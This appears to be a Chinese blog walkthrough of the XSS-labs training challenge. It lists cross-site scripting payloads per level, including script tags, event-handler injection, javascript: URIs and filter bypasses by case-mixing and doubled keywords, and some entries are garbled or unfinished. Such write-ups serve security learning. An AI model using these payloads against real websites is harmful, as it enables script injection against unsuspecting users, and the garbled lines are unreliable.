-
XSS-labs通关游戏
Level 1
Palyload:name=<script>alert(/test/)</script>
Level 2
Playload:keyword="><script>alert(/xss/)</script><"
Level 3
Palyload:keyword=' οnmοuseοver=’alert(/xss/)’
Level 4
Palyload:keyword=" οnmοuseοver='alert(/xss/)'
Level 5
Playload:“><a href=”javascript:alert:alert(/xss/)”>click</a>
Level 6
Playload:keyword=" ONmouseover='alert(/xss/)'
Level 7
Playload:keyword=" oonnmouseover='alert(/xss/)'
Playlaod:keyword="><a hhrefref="javascscriptript:alert(/xss/)">click</a>
Level 8
Playload:keyword=javascript:alert(/xss/)
Playload:keyword=javascript:alert(/xss/) html实体编码绕过
Level 9
Playload:keyword=javascript:alert('http://www.baidu.com')
Level 10
Playload:t_sort=" type="botton" οnmοuseοver='alert(/xss/)'
t_sort=click" type="button" οnclick="alert(/xss/)"
查看源码:
测试发现:
结果:
Level 11
Playload:
稍等,测试中。。。
-
相关阅读:
“成像光谱遥感技术中的AI革命:ChatGPT应用指南“
C语言从入门到进阶教程文章分享汇总~持续更新
内核线程的fork与普通的fork的区别
MR混合现实情景实训教学系统模拟高空作业情景
李沐《动手学习深度学习》d2lbook环境搭建
融合迁移学习与文本增强的中文成语隐喻知识识别与关联研究
探索GPT-4V在学术领域的应用——无需编程即可阅读和理解科学论文
【云原生】ingress-controller在多k8s集群中的应用
Java 基于 SpringBoot 的校园疫情防控系统
怎样用 Python数据 写一个自动交易的股票程序接口?
- 原文地址:https://blog.csdn.net/qq_44932745/article/details/125454552